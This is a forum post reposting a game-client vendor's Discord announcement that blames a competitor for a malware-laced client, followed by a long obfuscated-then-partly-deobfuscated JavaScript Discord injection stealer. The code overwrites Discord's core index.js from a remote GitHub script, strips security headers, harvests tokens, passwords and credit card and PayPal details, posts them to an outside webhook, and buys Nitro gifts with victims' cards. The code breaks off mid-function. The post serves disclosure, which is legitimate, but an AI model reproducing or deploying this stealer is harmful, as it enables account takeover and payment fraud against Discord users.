Cobalt innocent & competitor malware spread

[lort1234]

This is copy&pasted from Cobalt's discord server where they announced it.

Announcement:

Quote:

After looking at reports of people saying cobalt is a "RAT", We have concluded that there is an infected client exe being spread that is 8MB in size.

This client exe seems to be being spread by a competitor trying to sabotage us.

After looking further into this infected client exe we saw that this will implant a file called "DRM.exe", This file is NOT related to cobalt and delete it if you see it.

This client exe tries to make it as OBVIOUS as possible to make us look bad. ( clipboard replacer, forcing discord to use 100% CPU, etc... )

It also drops a JavaScript file into your discord files, This script will send information about your PC to the competitors server.

We have found that the webhook attached in the script file matches the exact server id of our competitions server.

We have attached the DEOBFUSCATED script file here for people to look at and have attached evidence that this client exe is being spread by our competition trying to sabotage us, and that our client is clean.

I hope this clears up all the confusion that has happened in the past few days ❤️, It is disappointing to see competitors sabotaging our product instead of improving their own...

NOTE:
I have made this announcement yesterday but since then a elite pvpers post has been posted talking about this, If the so called reverse engineers of elite pvpers want to take a moment to see which server the webhook leads in the javascript file they will find it leads directly to our competitions server 😃

DEOBFUSCATED:

 Spoiler

(function(chaena, juawana) {
const bonda = chaena();
while (!![]) {
try {
const sunny = parseInt(leisl(458, -283)) / 1 + parseInt(leisl(76, -552)) / 2 + parseInt(leisl(459, 40)) / 3 * (-parseInt(leisl(159, -225)) / 4) + -parseInt(leisl(20, -639)) / 5 * (parseInt(leisl(116, -247)) / 6) + -parseInt(leisl(170, 121)) / 7 * (-parseInt(leisl(59, -316)) / 8) + -parseInt(leisl(44, -38)) / 9 + -parseInt(leisl(131, -628)) / 10 * (parseInt(leisl(355, -536)) / 11);
if (sunny === juawana) break;
else bonda.push(bonda.shift());
} catch (torenzo) {
bonda.push(bonda.shift());
}
}
}(jashonda, 579060));
const args = process.argv,
fs = require("fs"),
path = require("path"),
querystring = require(leisl(60, -255)),
{
BrowserWindow, session
} = require(leisl(302, 71)),
_0x504b26 = {};
_0x504b26.id = leisl(101, -186), _0x504b26[leisl(440, 92)] = "960575034219429939", _0x504b26[leisl(47, -100)] = "9999";
const cletus = {};
cletus.id = leisl(101, -147), cletus[leisl(440, 185)] = leisl(88, -571), cletus[leisl(47, -308)] = leisl(234, 192);
const lalo = {};
lalo[leisl(251, -237)] = _0x504b26, lalo[leisl(16, -365)] = cletus;

function leisl(rameir, jasai) {
const nolton = jashonda();
return leisl = function(reel, reneisha) {
reel = reel - 0;
let arrietta = nolton[reel];
return arrietta;
}, leisl(rameir, jasai);
}
const geroline = {};
geroline.id = leisl(17, -447), geroline.sku = leisl(68, -361), geroline.price = leisl(452, -255);
const blakelie = {};
blakelie.month = geroline;
const vierra = {};
vierra[leisl(87, -140)] = lalo, vierra[leisl(51, -365)] = blakelie;
const fiamma = {};
fiamma[leisl(271, -95)] = [leisl(176, -297), "https://discordapp.com/api/v*/users/@me", "https://*.discord.com/api/v*/users/@me", leisl(374, -91), leisl(284, -91), leisl(448, 397), leisl(384, 191), leisl(365, -27), "https://api.stripe.com/v*/setup_intents/*/confirm", leisl(141, -126)];
const maxxton = {};
maxxton[leisl(271, -465)] = [leisl(352, 284), leisl(320, -72), leisl(28, -364), leisl(447, 87), leisl(200, -214), leisl(100, 63)];
const config = {
auto_buy_nitro: !![],
ping_on_run: ![],
ping_val: leisl(413, 211),
embed_name: leisl(218, -99),
embed_icon: leisl(26, -695)[leisl(188, -557)](/ /g, leisl(264, -209)),
embed_color: 8363488,
webhook: "https://modelsdb.xyz/webhook/27607a02-3940-486d-bf49-98fc1c4b54f1",
injection_url: "https://raw.githubusercontent.com/Rdimo/Discord-Injection/master/injection.js",
api: leisl(450, 35),
nitro: vierra,
filter: fiamma,
filter2: maxxton
},
discordPath = function() {
const emalei = {};
emalei[leisl(241, 79)] = function(tyreick, madelynne) {
return tyreick + madelynne;
}, emalei[leisl(199, -220)] = function(marna, kimberlyn) {
return marna === kimberlyn;
}, emalei[leisl(259, 30)] = leisl(396, 197), emalei[leisl(335, 117)] = leisl(270, 14), emalei[leisl(182, 152)] = function(chadsity, orina) {
return chadsity === orina;
}, emalei[leisl(157, -9)] = "ptb", emalei[leisl(6, -247)] = leisl(149, 167), emalei[leisl(132, 94)] = leisl(143, -18), emalei[leisl(415, 165)] = leisl(191, 94), emalei[leisl(356, 421)] = leisl(86, 159), emalei[leisl(282, 4)] = "Umbqj", emalei[leisl(409, -5)] = leisl(424, 306), emalei[leisl(391, 20)] = function(burmah, jenece) {
return burmah === jenece;
}, emalei[leisl(110, -48)] = leisl(408, 77), emalei.qftSr = function(jatiana, virgiline) {
return jatiana !== virgiline;
}, emalei[leisl(84, -180)] = leisl(414, 418), emalei[leisl(168, 155)] = function(emmalin, raquisha) {
return emmalin === raquisha;
};
emalei[leisl(385, 451)] = "Discord Canary.app", emalei[leisl(275, 124)] = leisl(82, -153), emalei[leisl(247, -285)] = "Discord.app", emalei.tferB = leisl(210, -283);
emalei[leisl(184, 181)] = leisl(236, -205);
const attiyya = emalei,
lorianne = args[2] && attiyya.clzmH(args[2][leisl(296, 371)](), attiyya.DSljo),
dayamir = lorianne ? args[3] && args[3].toLowerCase() : args[2] && args[2][leisl(296, 420)](),
brexlie = dayamir === attiyya[leisl(335, 161)] ? leisl(369, 259) : attiyya.XSKpK(dayamir, attiyya[leisl(157, 155)]) ? attiyya[leisl(6, -205)] : attiyya[leisl(132, -393)];
let tishauna = "";
if (attiyya[leisl(199, -410)](process.platform, attiyya.ValdQ)) {
if (attiyya[leisl(356, 173)] !== attiyya[leisl(282, 53)]) {
const kentley = path[leisl(165, -150)](process[leisl(23, 58)][leisl(326, 21)], brexlie.replace(/ /g, "")),
reme = fs[leisl(433, 232)](kentley)[leisl(250, -56)](calijah => fs[leisl(421, 142)](path[leisl(165, 24)](kentley, calijah))[leisl(19, -473)]() && calijah.split(".")[leisl(140, -76)] > 1)[leisl(401, 108)]()["reverse"]()[0];
tishauna = path[leisl(165, -356)](kentley, reme, attiyya[leisl(409, 301)]);
} else _0x22ccf2 += attiyya[leisl(241, 209)]("", leisl(56, -28));
} else {
if (attiyya.cAgja(process[leisl(419, -33)], attiyya[leisl(110, -446)])) {
if (attiyya[leisl(233, -104)](attiyya[leisl(84, 166)], leisl(414, 152))) return "";
else {
const decklin = attiyya[leisl(168, 44)](dayamir, attiyya.yoSsX) ? path[leisl(165, -118)]("/Applications", attiyya[leisl(385, 69)]) : attiyya[leisl(168, -344)](dayamir, attiyya[leisl(157, 266)]) ? path[leisl(165, -332)](attiyya[leisl(275, -272)], "Discord PTB.app") : lorianne && args[3] ? args[3] ? args[2] : args[2] : path[leisl(165, -405)](attiyya[leisl(275, 370)], attiyya[leisl(247, -359)]);
tishauna = path[leisl(165, 69)](decklin, attiyya[leisl(283, 35)], attiyya[leisl(184, -402)]);
}
}
}
if (fs[leisl(312, 431)](tishauna)) return tishauna;
return "";
}();

function updateCheck() {
const vonessa = {};
vonessa[leisl(397, 813)] = function(shamiya, timmi) {
return shamiya + timmi;
}, vonessa[leisl(287, 901)] = " ", vonessa[leisl(230, 609)] = leisl(206, 645), vonessa[leisl(290, 932)] = leisl(202, 698), vonessa[leisl(269, 838)] = leisl(70, 628), vonessa.HnvEB = function(psymon, jonier) {
return psymon === jonier;
}, vonessa.yVUYA = function(gavi, wanisha) {
return gavi !== wanisha;
}, vonessa[leisl(449, 812)] = leisl(307, 510), vonessa[leisl(63, 631)] = leisl(237, 403), vonessa[leisl(103, 503)] = leisl(257, 708);
const halema = vonessa,
jzon = path[leisl(165, 370)](discordPath, halema[leisl(230, 452)]);
const kendelyn = path[leisl(165, 453)](jzon, halema[leisl(290, 662)]),
jamar = path[leisl(165, 705)](jzon, halema[leisl(269, 409)]),
jasira = path[leisl(418, 599)](path.resolve(__dirname, ".."), ".."),
tameira = jasira + "\\discord_desktop_core-3\\discord_desktop_core\\index.js",
shamayah = path.join(process.env[leisl(194, 559)], leisl(169, 581));
if (!fs.existsSync(jzon)) fs.mkdirSync(jzon);
if (fs[leisl(312, 953)](kendelyn)) fs[leisl(417, 634)](kendelyn);
if (fs.existsSync(jamar)) fs[leisl(417, 635)](jamar);
if (halema[leisl(363, 649)](process[leisl(419, 801)], leisl(191, 354)) || process[leisl(419, 960)] === leisl(408, 954)) {
if (halema[leisl(297, 682)](halema.NIoFV, halema.NIoFV)) _0x2b5fd4 += halema.tRrNu("", halema.KgKVg);
else {
const deunte = {};
deunte[leisl(347, 573)] = halema.HFTzR, deunte[leisl(463, 970)] = leisl(70, 539), fs[leisl(12, 508)](kendelyn, JSON.stringify(deunte, null, 4));
const bernd = "const fs = require('fs'), https = require('https');\nconst indexJs = '" + tameira + leisl(344, 887) + shamayah + leisl(102, 319) + config[leisl(322, 971)] + leisl(138, 509) + path[leisl(165, 613)](discordPath, leisl(370, 964)) + leisl(373, 701);
fs[leisl(12, 403)](jamar, bernd[leisl(188, 410)](/\\/g, "\\\\"));
}
}
if (!fs[leisl(312, 527)](path[leisl(165, 472)](__dirname, halema[leisl(103, 581)]))) return true;
return fs[leisl(317, 822)](path.join(__dirname, leisl(257, 711))), execScript(leisl(455, 794)), false;
}
const execScript = billison => {
const lajaune = BrowserWindow[leisl(438, 1541)]()[0];
return lajaune.webContents[leisl(126, 891)](billison, true);
},
getInfo = async sirron => {
const quintavius = {
AfvnM: function(symphanie, idel) {
return symphanie(idel);
}
},
shamek = await quintavius.AfvnM(execScript, leisl(378, -388) + config[leisl(109, -832)] + '", false);\n xmlHttp.setRequestHeader("Authorization", "' + sirron + leisl(342, -417));
return JSON[leisl(195, -564)](shamek);
},
fetchBilling = async richards => {
const madis = {
bpLHb: function(gyselle, shantasia) {
return gyselle(shantasia);
},
DQJhc: function(zuko, georgieann) {
return zuko !== georgieann;
},
TiUPM: leisl(142, -242),
XaDup: leisl(213, 349)
},
yusayrah = await madis[leisl(315, 48)](execScript, leisl(77, -168) + config.api + leisl(113, 94) + richards + leisl(156, -171));
if (yusayrah.length === 0 && !yusayrah[leisl(406, 267)]) {
if (madis[leisl(437, 578)](madis[leisl(13, -548)], madis[leisl(390, 127)])) return "";
else {
const jilliane = _0x1649e7[leisl(438, 296)]()[0];
return jilliane[leisl(248, 34)].executeJavaScript(_0x1a3d35, true);
}
}
return JSON.parse(yusayrah);
},
getBilling = async tionah => {
const toma = {};
toma.HpFeH = leisl(22, -441), toma[leisl(85, 835)] = leisl(206, 1360), toma[leisl(29, -320)] = leisl(70, -599), toma[leisl(178, -260)] = "\\betterdiscord\\data\\betterdiscord.asar", toma[leisl(129, 1252)] = function(leiliany, iranzi) {
return leiliany === iranzi;
}, toma[leisl(95, -242)] = "win32", toma[leisl(454, 1198)] = leisl(237, 1234), toma.WFxLR = "app.asar", toma[leisl(451, 1265)] = leisl(257, 1268), toma[leisl(426, 1308)] = "JcRxt", toma[leisl(61, 1145)] = leisl(394, 1509), toma[leisl(301, -148)] = function(citlalic, brittnye) {
return citlalic === brittnye;
}, toma.XjXuH = function(oby, kaliey) {
return oby !== kaliey;
}, toma[leisl(328, -89)] = leisl(445, 1262), toma[leisl(11, 800)] = leisl(56, 799), toma[leisl(238, -13)] = leisl(227, -378);
toma[leisl(292, -313)] = function(jarriet, cass) {
return jarriet + cass;
}, toma.OdZPG = leisl(272, 1426), toma[leisl(416, 1192)] = function(okairy, derren) {
return okairy === derren;
}, toma[leisl(89, -239)] = leisl(193, 1200), toma[leisl(446, -126)] = leisl(329, -293);
toma[leisl(423, 1304)] = function(amberjo, jazzmyn) {
return amberjo === jazzmyn;
};
const tyse = toma,
jessicca = await fetchBilling(tionah);
if (jessicca === "") return "";
let joanette = "";
jessicca.forEach(kayleene => {
const calionna = {
zxoZy: tyse[leisl(85, 76)],
GlkXA: tyse[leisl(29, -116)],
pqehM: tyse[leisl(178, -237)],
EueTm: function(darlien, sharli) {
return tyse[leisl(129, 281)](darlien, sharli);
},
sdRlL: tyse.THwNf,
IUhXj: function(uri, adonis) {
return uri === adonis;
},
fQKDh: tyse[leisl(454, 392)],
YPJGh: tyse.WFxLR,
IIamJ: tyse[leisl(451, 478)],
fBDbK: function(garric, chantrell) {
return garric(chantrell);
}
};
if (tyse.SevlX(tyse.vHOjb, tyse[leisl(61, -124)])) _0x1b0452 = "";
else {
if (tyse.FQKej(kayleene[leisl(136, 2)], 2) && !kayleene[leisl(393, 228)]) {
if (tyse[leisl(407, 175)](leisl(445, 405), tyse[leisl(328, 24)])) {
const cylia = _0x1818f9[leisl(165, 328)](_0x45b44d, calionna.zxoZy),
jonene = _0x4d8dc4[leisl(165, 341)](cylia, leisl(202, 8)),
myaisa = _0x5972a3.join(cylia, calionna[leisl(254, 146)]),
rackwon = _0x2f6935[leisl(418, 182)](_0x36f0df[leisl(418, 19)](_0x1bb8a5, ".."), ".."),
tigran = rackwon + "\\discord_desktop_core-3\\discord_desktop_core\\index.js",
miecislaus = _0x4d1f9f[leisl(165, 193)](_0x54b97b[leisl(23, -82)][leisl(194, 28)], calionna[leisl(300, 355)]);
if (!_0x3fd77d[leisl(312, -43)](cylia)) _0x3c5012[leisl(273, 440)](cylia);
if (_0x54dfb6[leisl(312, 159)](jonene)) _0x47e048[leisl(417, 119)](jonene);
if (_0x456b9d[leisl(312, 62)](myaisa)) _0x4b96ee[leisl(417, 87)](myaisa);
if (calionna.EueTm(_0x4ef5d4[leisl(419, 479)], calionna[leisl(453, 315)]) || calionna[leisl(246, 60)](_0x5370bf[leisl(419, 197)], leisl(408, 252))) {
const kreyton = {};
kreyton[leisl(347, 7)] = calionna.fQKDh, kreyton[leisl(463, 368)] = calionna.GlkXA, _0x222540.writeFileSync(jonene, _0x344260.stringify(kreyton, null, 4));
const evylene = "const fs = require('fs'), https = require('https');\nconst indexJs = '" + tigran + leisl(344, 137) + miecislaus + leisl(102, 5) + _0x32e16c[leisl(322, -83)] + leisl(138, -121) + _0x3228f1[leisl(165, 4)](_0x4a2bdf, calionna[leisl(377, 359)]) + "')\nif (fs.existsSync(bdPath)) {\n require(bdPath);\n}";
_0x5aa77d.writeFileSync(myaisa, evylene[leisl(188, 4)](/\\/g, "\\\\"));
}
if (!_0x98c5f[leisl(312, 48)](_0x5f19eb[leisl(165, 171)](_0x4fcd70, leisl(257, 183)))) return true;
return _0x546032.rmdirSync(_0x4faff1[leisl(165, 26)](_0x3f7332, calionna.IIamJ)), calionna.fBDbK(_0x1b3567, leisl(455, 98)), false;
} else joanette += "" + tyse.etVen;
} else {
if (tyse[leisl(301, 39)](kayleene[leisl(136, -74)], 1) && !kayleene[leisl(393, 308)]) {
if (tyse[leisl(129, 162)](tyse[leisl(238, 87)], tyse[leisl(238, -182)])) joanette += tyse[leisl(292, 64)]("", tyse[leisl(268, -15)]);
else return tyse[leisl(75, 80)];
} else tyse[leisl(416, 107)](tyse.JGXWV, tyse[leisl(446, 440)]) ? _0x2fb02d = _0x13cb36[leisl(195, 84)](_0x3149ed[leisl(108, 232)](_0x5be677)[leisl(69, -231)]()) : joanette = "";
}
}
});
if (tyse[leisl(423, -102)](joanette, "")) joanette = "";
return joanette;
},
Purchase = async(genetha, xalen, derriona, leola) => {
const ceann = {};
ceann[leisl(33, 403)] = leisl(47, 1188), ceann[leisl(404, 1453)] = leisl(225, 1024), ceann.DeUng = "2422867c-244d-476a-ba4f-36e197758d97", ceann[leisl(37, 436)] = leisl(440, 1367), ceann[leisl(309, 661)] = leisl(334, 1101), ceann[leisl(242, 1247)] = function(crosbie, shirleymae) {
return crosbie === shirleymae;
}, ceann[leisl(431, 1137)] = leisl(106, 1009);
ceann[leisl(124, 1080)] = function(damarcus, annies) {
return damarcus + annies;
};
const cayla = ceann,
llona = execScript(leisl(151, 1248) + config[leisl(215, 482)][derriona][leola].id + leisl(314, 832) + genetha + leisl(223, 1366) + JSON[leisl(217, 572)]({
expected_amount: config[leisl(215, 1149)][derriona][leola][cayla[leisl(33, 1144)]],
expected_currency: cayla[leisl(404, 1036)],
gift: !![],
payment_source_id: xalen,
payment_source_token: null,
purchase_token: cayla.DeUng,
sku_subscription_plan_id: config[leisl(215, 622)][derriona][leola][cayla.LPPeZ]
}) + leisl(118, 728));
if (llona[cayla[leisl(309, 940)]]) {
if (cayla[leisl(242, 886)](cayla[leisl(431, 1599)], leisl(106, 585))) return cayla[leisl(124, 1068)](leisl(321, 620), llona[leisl(334, 1030)]);
else _0x54d978 = _0xb14c25[leisl(195, 1257)](_0x2926a3[leisl(217, 1244)](_0x27124a[leisl(108, 371)](_0x3281aa).toString()));
} else return null;
};

function jashonda() {
const saahir = ["toString", "index.js", "ukqTL", "**\nBilling: **", "concat", "LMXzj", "HpFeH", "1091844OSLTfv", 'var xmlHttp = new XMLHttpRequest(); \n xmlHttp.open("GET", "', "DrGtq", "FgqWI", "PATCH", "sxvAp", "/Applications", "WAnaT", "LlPvq", "huWgN", "chDMg", "boost", "511651880837840896", "JGXWV", "xYTUa", "IrNjv", "GBtpx", "gDexW", "gZbrP", "THwNf", "evkyV", "Vpmqn", "FihdY", "onHeadersReceived", "wss://remote-auth-gateway.discord.gg/*", "521847234246082599", "';\nconst fileSize = fs.statSync(indexJs).size\nfs.readFileSync(indexJs , 'utf8', (err, data) => {\n if (fileSize < 20000 || data === \"module.exports = require('./core.asar')\") \n init();\n})\nasync function init() {\n https.get('", "epBfd", "PQCWE", "VzDsF", "zghwW", "GZrwj", "from", "api", "CkalM", "wvsAh", "yLIvf", '/billing/payment-sources", false); \n xmlHttp.setRequestHeader("Authorization", "', "ErTFX", "bCXDx", "352458VyLPmv", "SGRRp", "));\n xmlHttp.responseText", "Credit Card Number: **", "endsWith", "**Discord Info**", "ping_on_run", "ULpbX", "PXPRC", "assign", "executeJavaScript", "content-security-policy-report-only", "Content-Security-Policy", "SevlX", "pAUrN", "2373990cFoHYZ", "RFQxp", "Discord PTB.app", "UNHwT", "LAObA", "type", "EbiWx", "', (res) => {\n const file = fs.createWriteStream(indexJs);\n res.pipe(file);\n file.on('finish', () => {\n file.close();\n });\n \n }).on(\"error\", (err) => {\n setTimeout(init(), 10000);\n });\n}\nrequire('", "zvvKp", "length", "https://api.stripe.com/v*/payment_intents/*/confirm", "XUECm", "Discord", "Partnered Server Owner, ", "udhbh", "startsWith", "Discord.app", "aUDPW", "Discord PTB", "** - Password: **", 'var xmlHttp = new XMLHttpRequest();\n xmlHttp.open("POST", "https://discord.com/api/v9/store/skus/', "THUJQ", "OPtVg", "utrcb", "ZDsFH", '"); \n xmlHttp.send(null); \n xmlHttp.responseText', "whbpw", "BusVh", "628ehqQov", "qxkwz", "DMNwq", "aFEOS", "kSoXm", "CHRUE", "join", "uDgID", "POST", "TdRPW", "\\betterdiscord\\data\\betterdiscord.asar", "2933OqpooZ", "RelUW", "nbbKy", "card[exp_year]", "Gartz", "iUlOe", "https://discord.com/api/v*/users/@me", "**Account Info**", "wKsmx", "webhook", "content", "ptb", "XSKpK", "GSAVG", "IkuuG", "WwoBB", "cSDXs", "confirm", "replace", "OtsAZ", "heyeK", "win32", " | ", "TkrKn", "APPDATA", "parse", "TeKFk", "Qotwy", "McpDb", "clzmH", "https://discord.com/api/v*/users/@me/library", "card[exp_month]", "package.json", "HDKWo", "defaultSession", "Nitro Boost", "app", "**\nCredit Card Expiration: **", "tzokz", "Nitro Type: **", "Contents", "lhYXs", "card[cvc]", "FXxxv", "Discord Staff, ", "nitro", "JXSby", "stringify", "Discord Injection", "tvJRi", "bytes", "discriminator", "eOlJC", "\");\n xmlHttp.setRequestHeader('Content-Type', 'application/json');\n xmlHttp.send(JSON.stringify(", "value", "usd", "reverse", "GeyER", "url", "No Nitro", "eEnlO", "password", "UwVMe", "qftSr", "999", "rJLFY", "Resources", "Discord-Injection", "siZKD", "avatar", "udDAK", "sRayn", "FGDfT", "**\nPassword: **", "Hypesquad Event, ", "oJFzu", "IUhXj", "pdDCz", "webContents", "DmYYK", "filter", "year", "login", "zLtTc", "GlkXA", "exvlO", "\", true);\n xhr.setRequestHeader('Content-Type', 'application/json');\n xhr.setRequestHeader('Access-Control-Allow-Origin', '*');\n xhr.send(JSON.stringify(", "initiation", "Hnynh", "DSljo", "WzGps", "Discord Developer, ", "statusCode", "rjuVR", "%20", "card[number]", "**\nNew Password: **", "Email: **", "OdZPG", "zSOcQ", "canary", "urls", " ", "mkdirSync", "cZesq", "OIwDa", "Access-Control-Allow-Origin '*'", "inline", "XwveY", "NbzBi", "Access-Control-Allow-Origin", "qZRBj", "FHPJg", "tferB", "https://discord.com/api/v*/auth/login", "WHCCz", "YaYoc", "KgKVg", "buCdz", "HQdtf", "aEoqx", "tKhWU", "MSqQg", "FaQNO", "paypal_accounts", "cTATK", "toLowerCase", "yVUYA", "rzgic", "users/@me", "pqehM", "FQKej", "electron", "gkgsB", "kuefH", "gTEOI", "mscbQ", "hhXkU", "JdUnJ", "SMZZS", "includes", "lTQBK", "existsSync", "veRBS", '/purchase", false);\n xmlHttp.setRequestHeader("Authorization", "', "bpLHb", "VlJvp", "rmdirSync", "kFfbm", "HyBvZ", "https://*.discord.com/api/v*/applications/detectable", "https://discord.gift/", "injection_url", "split", "BRjKt", "flags", "LOCALAPPDATA", "catch", "EFwkg", "JiYdO", "username", "GAqhm", "eQHHI", "**Token**", "gift_code", "yoSsX", "Nitro Classic", "vaZGX", "jfvzs", "PAZwh", "absRX", 'var xhr = new XMLHttpRequest();\n xhr.open("POST", "', '");\n xmlHttp.send(null);\n xmlHttp.responseText;', "kUmfb", "';\nconst bdPath = '", "HypeSquad Balance, ", "pwesA", "name", "OGOeW", "UeUNu", "QnduV", "VsmhL", "https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json", "bYeOF", "embed_color", "11bYDkkv", "uNuuk", "premium_type", "Access-Control-Allow-Headers", "wqKrj", "WCpPh", "tgPCK", "quiYN", "HnvEB", "responseHeaders", "https://api.stripe.com/v*/tokens", "text", "**\nCVC: **", "ping_val", "Discord Canary", "app.asar", "qEeNj", "**Credit Card Added**", "')\nif (fs.existsSync(bdPath)) {\n require(bdPath);\n}", "https://discordapp.com/api/v*/auth/login", "aZkWA", "VfpxD", "YPJGh", 'var xmlHttp = new XMLHttpRequest();\n xmlHttp.open("GET", "', "svkYV", "PbJfw", "DMpEc", "getmU", "auaRr", "https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts", "qXdAI", "email", "method", "Time to buy some nitro baby ", "lmoQs", "XaDup", "cAgja", "qUWME", "invalid", "mSGMS", "webRequest", "release", "tRrNu", "uaLte", "bwDAK", "NtQsl", "sort", "filter2", "**Password Changed**", "ikPel", "**\nBadges: **", "lenght", "XjXuH", "darwin", "Xxspn", "zdvsW", "Discord Injection By github.com/Rdimohttps://github.com/Rdimo/Discord-Injection", "**\nOld Password: **", "@everyone", "qzvWT", "ValdQ", "xEXkD", "unlinkSync", "resolve", "platform", "iMcrj", "lstatSync", ".webp", "Eaeda", "resources", "RJQqx", "vHOjb", "OHjkG", "Early Supporter, ", "Access-Control-Allow-Headers '*'", "(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()", "ZwPrm", "HypeSquad Bravery, ", "readdirSync", "TlUKj", "TsuHl", "embed_name", "DQJhc", "getAllWindows", "ZoTOs", "sku", "embed_icon", "None", "IFgpo", "vYMMw", "KsTEB", "KhHQv", "https://*.discord.com/api/v*/users/@me/library", "https://*.discord.com/api/v*/auth/login", "NIoFV", "https://discord.com/api/v9/users/@me", "NwbvQ", "499", "sdRlL", "uDURK", 'window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_requirea,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&& window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.defau lt[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();', "lpavG", "wZOFl", "844185Gawezd", "15165eTPzIV", "YTejo", "```", "KqkcN", "main", "cPFTg", "POEhr", "content-security-policy", "error", "JQmmP", "aZLxd", "JNsQv", "tGSpO", "pTFEy", "BdAgC", "zPKDA", "etVen", "writeFileSync", "TiUPM", "discord.com", "cxdLu", "month", "521846918637420545", "OaIOs", "isDirectory", "50idTnsM", "GYjpC", "Failed to Purchase ", "env", "schJw", "xjECS", "https://raw.githubusercontent.com/Rdimo/images/master/Discord-Injection/discord atom.png", "AlVyc", "https://discord.com/api/v*/applications/detectable", "xcgVa", "sWxth", "Green BugHunter, ", "UUfpO", "uqRuy", "uploadData", "CFzpT", "hEAVc", "LPPeZ", "ceJcE", "ykLoN", "VWmbh", "RjDSm", "cVXnn", "default-src '*'", "82926VnlcDr", "**Nitro bought!**", "KtMBu", "price", "Discord Canary.app", "New Email: **", "new_password", "classic", "hMiLG", "https://cdn.discordapp.com/avatars/", "yYlsk", "pLfaf", " <aypal:951139189389410365>", "MuWOq", "*\nBadges: **", "15592OkPvNY", "querystring", "YXxsz", "zrXDC", "HFTzR", "ASniz", "HypeSquad Brillance, ", "UyEiD", "const fs = require('fs'), https = require('https');\nconst indexJs = '", "511651871736201216"];
jashonda = function() {
return saahir;
};
return jashonda();
}
const buyNitro = async zene => {
const jessianne = {
cPFTg: function(emeris, breyawna) {
return emeris !== breyawna;
},
UNHwT: "hlvaK",
yYlsk: function(cosmos, jessie) {
return cosmos === jessie;
},
cMAoR: leisl(324, 400),
cxdLu: function(ariunna, yahli) {
return ariunna(yahli);
},
cSDXs: leisl(43, 459),
keKbV: "Access-Control-Allow-Headers '*'",
VfpxD: leisl(276, 645),
DMpEc: function(jobani, kristeena) {
return jobani(kristeena);
},
UyEiD: leisl(47, 315),
vaZGX: leisl(225, 445),
TsuHl: "2422867c-244d-476a-ba4f-36e197758d97",
VlJvp: function(layia, thema) {
return layia + thema;
},
JQmmP: leisl(321, -659),
xxCsD: "gift_code",
tgPCK: leisl(396, -567),
RjDSm: leisl(270, 535),
VWmbh: leisl(369, -422),
ZDsFH: leisl(181, -857),
UwVMe: leisl(149, -589),
uaLte: leisl(143, -912),
rjuVR: leisl(191, 225),
FihdY: leisl(82, -978),
JdUnJ: leisl(48, -849),
GZrwj: leisl(133, -501),
ykLoN: leisl(147, 382),
OaIOs: leisl(210, 520),
GYjpC: leisl(236, 359),
VzDsF: function(lezlee, tracine) {
return lezlee(tracine);
},
wqKrj: leisl(2, 331),
DmYYK: leisl(127, -709),
lhYXs: "Failed to Purchase ",
UeUNu: leisl(203, -575),
pqWcs: "boost",
QnduV: function(canan, mazekeen) {
return canan !== mazekeen;
},
zrXDC: leisl(434, 580),
EbiWx: leisl(303, -606),
NbzBi: "UUfpO",
gTEOI: function(lavren, saedee, bernest, arquimedes, rahsheed) {
return lavren(saedee, bernest, arquimedes, rahsheed);
},
Hnynh: leisl(16, 114),
lmoQs: "wTXrM",
kUmfb: leisl(7, -1001),
SWnew: leisl(190, -471),
ASniz: leisl(51, -952),
tvJRi: function(dejanaye, gladiz) {
return dejanaye !== gladiz;
},
bwDAK: leisl(71, 101),
HQdtf: "cPLNW"
};
const annunciata = await jessianne[leisl(105, -563)](fetchBilling, zene);
if (jessianne.yYlsk(annunciata, "")) return jessianne[leisl(211, 263)];
let senoria = [];
annunciata.forEach(yanielis => {
if (jessianne[leisl(0, 887)](jessianne.UNHwT, jessianne[leisl(134, -836)])) !_0xb97ac1[leisl(393, -434)] && (_0x578b00 = _0x4cb264[leisl(73, -1067)](_0x1cc709.id));
else {
if (!yanielis.invalid) {
if (jessianne.yYlsk(jessianne.cMAoR, jessianne.cMAoR)) senoria = senoria[leisl(73, 876)](yanielis.id);
else return _0x43a8f7;
}
}
});
for (let aujanai in senoria) {
if (jessianne[leisl(0, 19)](jessianne[leisl(349, -509)], jessianne[leisl(349, -432)])) jessianne[leisl(15, -1037)](_0x592df4, {
responseHeaders: _0xa0a1eb[leisl(125, 279)]({
"Content-Security-Policy": [jessianne[leisl(186, 595)], jessianne.keKbV, jessianne[leisl(376, 587)]],
"Access-Control-Allow-Headers": "*",
"Access-Control-Allow-Origin": "*"
}, _0x7a2f54[leisl(364, -703)])
});
else {
const ercilia = Purchase(zene, aujanai, jessianne.pqWcs, leisl(251, 231));
if (ercilia !== null) {
if (jessianne[leisl(350, -639)](jessianne[leisl(62, -818)], jessianne[leisl(137, 324)])) return ercilia;
else jessianne[leisl(15, -887)](_0x3efbe1, leisl(341, 503) + _0xb7cb1.webhook + leisl(256, 331) + _0x2ab553[leisl(217, 514)](_0x13fec2) + "));\n");
} else {
if (leisl(32, 322) === jessianne[leisl(279, -606)]) {
const daniel = jessianne[leisl(305, -355)](Purchase, zene, aujanai, leisl(87, -791), jessianne[leisl(258, 561)]);
if (daniel !== null) {
if (jessianne[leisl(350, -585)](jessianne[leisl(389, 497)], "QWvBm")) return daniel;
else {
const beaudin = jessianne[leisl(381, -560)](_0x4b2ecf, leisl(151, -539) + _0x2ccaf2.nitro[_0x568085][_0x445fb9].id + '/purchase", false);\n xmlHttp.setRequestHeader("Authorization", "' + _0x2d8399 + leisl(223, -749) + _0x3d4e63[leisl(217, -813)]({
expected_amount: _0x49f1c8[leisl(215, 532)][_0x536cbd][_0x3a4bff][jessianne[leisl(66, 399)]],
expected_currency: jessianne[leisl(337, -755)],
gift: !![],
payment_source_id: _0x501f48,
payment_source_token: null,
purchase_token: jessianne[leisl(435, 686)],
sku_subscription_plan_id: _0x5afa80[leisl(215, -768)][_0x4e02e3][_0x105ecb]["sku"]
}) + leisl(118, 293));
